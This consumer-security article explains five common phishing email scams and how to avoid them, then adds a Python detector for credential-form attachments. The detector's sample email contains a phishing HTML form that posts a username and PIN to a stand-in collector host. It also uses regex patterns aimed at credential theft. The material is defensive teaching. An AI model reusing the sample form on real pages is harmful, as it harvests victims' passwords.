Everyone should know by now that there are, sadly, no members of deposed African royal families who want to share millions of dollars with you, no strings attached. What everyone needs to know, however, is that the underlying principles of email phishing scams like that oldie but goodie are alive and well.
According to Kaspersky Lab research (securelist.com), 3.4 percent of all emails in 2012 had malicious attachments. If that doesn’t sound like a lot, consider how many emails you get each week: at that rate, you’re going to get a lot of dangerous emails.
These five popular email scams disguise themselves as coming from legitimate, trusted sources, tricking their recipients into opening the emails and clicking on harmful links or downloading malicious attachments.
- Password Change Alerts: One of the more common scams, and one that is approaching Nigerian Millions oldie but goodie status, is the password reset confirmation email scam. In this, users get fake notifications from an email, social media, bank or some other online service alerting them that their account has been hacked and they need to reset their password. Users are then prompted to open an attachment in which they fill out their username and new password and/or PIN. These attachments not only steal the information entered, but can also steal any username/password combination used on the now-infected machine.
- Bogus Bookings: Newer to the spam/phishing game are fake emails that appear to come from major airlines and hotel chains confirming fake reservations. These scams induce alarmed recipients to click on malicious links or attachments. Once the user clicks on the link or attachment, they are sent to a hacked site that in turn redirects them to malicious sites full of harmful code that can exploit the user’s machine.
- Holidays/Tragedies: Holidays and tragedies are great opportunities for scammers because everybody gets emails at these times from people they may not directly know: charities soliciting donations for Hurricane Sandy victims, for instance, or companies offering you the opportunity to rent a Santa for a company Christmas party. Don’t open these attachments either; they will operate similarly to the bogus booking scams.
- You’re in a Crazy Facebook Video!: No, you’re not. But when user accounts get hacked on Twitter or Facebook, they can be hijacked to send messages to users like “OMG/LMAO somebody was taping you!,” prompting users to click on the embedded link to see their supposedly embarrassing moment now made public. What they get is a bogus warning that their media player is out of date, prompting them to download the necessary update. But when they click through, instead of downloading a software update they get malware that can steal sensitive data from their machine or smartphone.
- Good Site, Bad Link: Kaspersky Lab experts have even found malicious links on legitimate sites like Wikipedia and Amazon that allow users to create pages within the sites. Malicious links on these sites have the potential to lead unsuspecting users to sites with harmful code once the links are clicked on. These sites are also very good at promptly removing any such bogus pages, so the number of these threats is relatively low, but alarming.
The best way to avoid falling for phishing email scams is to always be extremely suspicious of any email asking for personal information, even if it supposedly comes from a trusted or reputable source. Never download attachments from unknown sources, and think long and hard before you download attachments even from reputable senders.
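The password change alert scam described above relies on an attachment that contains a form asking for a username and password. The following Python check for that pattern is an added example, not part of the original article; the sample email, the subject wording list and the function name are constructed for illustration.

```python
import re
from email import message_from_string, policy

# Constructed sample message (not a real email): a "password change alert"
# carrying an HTML attachment with a credential form.
SAMPLE = """\
From: "Example Bank" <alerts@bank.example>
To: user@mail.example
Subject: Your account was hacked - reset your password
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="BOUND"

--BOUND
Content-Type: text/plain; charset="utf-8"

Open the attached form and enter your username and new password.
--BOUND
Content-Type: text/html; charset="utf-8"
Content-Disposition: attachment; filename="reset.html"

<form action="http://collector.example/save" method="post">
<input name="user"><input type="password" name="pin"></form>
--BOUND--
"""

# Assumed heuristics: account-alert wording in the subject line, and an
# HTML attachment that contains a password input field.
LURE = re.compile(r"password|account|reset|hacked|verify", re.I)
PW_FIELD = re.compile(r"<input[^>]+type\s*=\s*[\"']?password", re.I)

def credential_form_attachments(raw):
    """Return filenames of HTML attachments that contain a password field,
    but only when the subject uses account-alert wording."""
    msg = message_from_string(raw, policy=policy.default)
    if not LURE.search(msg.get("Subject", "")):
        return []
    hits = []
    for part in msg.iter_attachments():
        if part.get_content_type() != "text/html":
            continue  # only HTML attachments can carry a fill-in form
        if PW_FIELD.search(part.get_content()):
            hits.append(part.get_filename())
    return hits

if __name__ == "__main__":
    print(credential_form_attachments(SAMPLE))
```

A legitimate service sends a reset link to its own site rather than a form to fill out in an attachment, which is why this combination is worth flagging.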
Finally, the best way to protect your system is to utilize a strong antivirus program like that offered by Kaspersky Lab and to keep all software programs, operating systems and web browsers on your system up to date.